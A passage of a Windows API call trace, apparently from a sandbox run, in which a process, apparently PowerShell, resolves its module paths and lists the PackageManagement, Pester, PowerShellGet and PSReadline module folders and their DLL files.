ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0170.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ac40) returned 1 [0170.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0170.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ac80) returned 1 [0170.788] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad60 | out: lpFileInformation=0xb156f8ad60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0170.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ac40) returned 1 [0170.789] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144f090 [0170.789] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e35144f090, nSize=0x105 | out: lpBuffer="") returned 0x97 [0170.789] CoTaskMemFree (pv=0x1e35144f090) [0170.789] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0170.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ac80) returned 1 [0170.790] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad60 | out: lpFileInformation=0xb156f8ad60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0170.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ac40) returned 1 [0170.793] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0170.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a830, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0170.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ac80) returned 1 [0170.809] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad60 | out: lpFileInformation=0xb156f8ad60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0170.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ac40) returned 1 [0170.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0170.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ac80) returned 1 [0170.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad60 | out: lpFileInformation=0xb156f8ad60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0170.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ac40) returned 1 [0170.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ab90) returned 1 [0170.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0170.810] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0xb156f8a8a0 | out: lpFindFileData=0xb156f8a8a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0170.810] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.811] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0170.811] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0170.811] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0170.811] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0170.811] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.812] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0170.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aac0) returned 1 [0170.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa80) returned 1 [0170.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ab90) returned 1 [0170.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0170.812] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0xb156f8a8a0 | out: lpFindFileData=0xb156f8a8a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146ae20 [0170.812] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.813] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0170.813] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0170.813] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0170.814] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0170.814] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8a860 | out: lpFindFileData=0xb156f8a860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0170.814] FindClose (in: hFindFile=0x1e35146ae20 | out: hFindFile=0x1e35146ae20) returned 1 [0170.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aac0) returned 1 [0170.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8aa80) returned 1 [0170.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8a4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0170.814] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8a710 | out: lpFindFileData=0xb156f8a710*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146bc60 [0170.815] FindNextFileW (in: hFindFile=0x1e35146bc60, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.815] FindNextFileW (in: hFindFile=0x1e35146bc60, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0170.816] FindNextFileW (in: hFindFile=0x1e35146bc60, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.816] FindClose (in: hFindFile=0x1e35146bc60 | out: hFindFile=0x1e35146bc60) returned 1 [0170.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa00) returned 1 [0170.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8a4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0170.816] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8a710 | out: lpFindFileData=0xb156f8a710*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b000 [0170.816] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.817] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0170.817] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a6d0 | out: lpFindFileData=0xb156f8a6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0170.817] FindClose (in: hFindFile=0x1e35146b000 | out: hFindFile=0x1e35146b000) returned 1 [0170.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a930) returned 1 [0170.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a8f0) returned 1 [0170.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8a350, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0170.818] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8a580 | out: lpFindFileData=0xb156f8a580*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146a820 [0170.818] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.819] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0170.819] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0170.819] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0170.819] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0170.820] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0170.820] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0170.820] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0170.820] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, 